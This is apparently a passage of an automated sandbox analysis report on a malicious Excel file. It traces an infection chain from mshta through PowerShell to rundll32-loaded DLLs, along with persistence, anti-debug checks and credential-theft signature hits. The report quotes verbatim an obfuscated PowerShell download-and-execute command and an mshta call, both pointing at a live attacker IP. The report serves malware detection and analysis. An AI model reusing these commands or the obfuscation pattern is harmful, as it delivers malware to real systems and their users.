                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServerJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDE7C.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                            Source: 48F2.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029200C4 push 8B4901F9h; iretd 4_3_029200CA
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_029208C5 push 8B4901F9h; iretd 4_3_029208CA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FF00280A21 pushad ; ret 6_2_000007FF00280B61
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret 9_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret 9_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10032B7D push ecx; ret 11_2_10032B90
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10030DFF push ecx; ret 11_2_10030E12
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: QWER.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x8882a
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\QWER.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni:Zone.Identifier read attributes | deleteJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,9_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,9_2_10018C9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100134F0 IsIconic,11_2_100134F0
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,11_2_10018C9A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1312 Thread sleep time: -300000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_9-32093
                            Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node graph_11-32093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,9_2_10030334
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,11_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,9_2_1003D873
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002D4087 mov eax, dword ptr fs:[00000030h] 9_2_002D4087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214087 mov eax, dword ptr fs:[00000030h] 10_2_00214087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274087 mov eax, dword ptr fs:[00000030h] 11_2_00274087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00364087 mov eax, dword ptr fs:[00000030h] 12_2_00364087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254087 mov eax, dword ptr fs:[00000030h] 14_2_00254087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00194087 mov eax, dword ptr fs:[00000030h] 15_2_00194087
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,9_2_10002280
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,9_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,9_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_1003ACCC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_10037657
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_1002F81E
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer,11_2_1003B89A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,11_2_1003B8BC
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_1003ACCC
                            Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/zqqw/zaas/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/zqqw/zaas/fe.html
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",GtcFgrxeupAr
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vnljigstknrhjwnk\pagi.wrr",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",fdhAQGhe
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qglmgufuicllvuzt\zdvyw.osp",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",MzSrktOhCbVh
                            Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kwvpkzxruoppyhz\jflthedjndgf.dni",DllRegisterServer
                            Source: Yara match File source: imedpub_2.xls, type: SAMPLE
                            Source: Yara match File source: C:\Users\user\Desktop\imedpub_2.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                            Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
                            Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3e0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2480000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.310000.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.7c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.29f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2580000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.ab0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2fc0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.a80000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.25c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4c0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.220000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.4f0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.b40000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.420000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.9d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.aa0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000A.00000002.523913691.0000000002621000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578128416.00000000028F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523436520.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577400839.0000000000320000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674984852.0000000000761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646503314.0000000002580000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675100735.00000000007F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577595095.0000000000411000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646421210.0000000000C41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577894458.0000000000AD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577987476.0000000002480000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580780340.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646662898.0000000002F91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577837506.0000000000A71000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645935439.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578250004.0000000002FC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646563852.0000000002670000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.526646791.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523882749.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646381329.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.526815635.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577793052.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.524151860.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.464757421.0000000000290000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.581619652.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523693615.0000000000AB1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577428378.0000000000351000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523730343.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523853691.00000000025C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.580991991.0000000000241000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674911093.0000000000710000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523666393.0000000000A80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523513402.00000000004F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645964256.0000000000181000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646120317.0000000000420000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675173904.0000000000821000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523491147.00000000004C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646698678.0000000002FD1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646029506.0000000000310000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646064656.0000000000371000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523130788.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.649782159.0000000000211000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577866677.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675036629.00000000007C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646641702.0000000002F60000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.577472790.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.523994055.0000000002F10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675503420.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646764610.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.524063481.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578315852.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.650185514.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578085930.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.578205625.0000000002F50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646533313.00000000025F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.645994754.0000000000220000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646245001.00000000004A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.649670122.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.646590734.00000000029F1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675011000.0000000000790000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
